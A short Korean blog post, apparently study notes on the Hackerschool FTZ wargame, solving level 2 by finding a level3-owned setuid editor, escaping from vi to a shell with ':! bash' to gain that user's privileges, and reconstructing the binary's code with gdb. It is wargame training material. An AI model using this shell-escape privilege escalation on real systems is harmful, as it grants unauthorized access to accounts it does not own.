www.hackerschool.org 를 바탕으로 공부한다.
level2 사용자로 로그인
ID : level2
Pass : hacker or cracker
$ ls -l
$ cat hint
$ find / -user level3 -perm -4000 2>/dev/null
$ ls -l /usr/bin/editor
$ which vi
$ ls -l /bin/vi
$ ls -l /usr/bin/vim
$ /usr/bin/editor
:! bash
$ my-pass
$ exit
:q!
○ 리버싱을 통한 의사코드 복원
$ gdb /usr/bin/editor
(gdb) disas main
1 2 3 4 5 6 7 8 9 | #include <sys/types.h> #include <unistd.h> #include <stdlib.h> int main() { setreuid(3003, 3003); system("/bin/vi"); } | cs |
[참고][클릭]setreuid 함수에 대해서(Real UID / Effective UID)
반응형
'보안과정 > 리버싱' 카테고리의 다른 글
| Level 5 → Level 6 (0) | 2017.11.29 |
|---|---|
| Level 4 → Level 5 (0) | 2017.11.28 |
| Level 3 → Level 4 (0) | 2017.11.28 |
| Level1 문제 도전. (0) | 2017.11.27 |
| 백도어(Backdoor) (0) | 2017.11.27 |
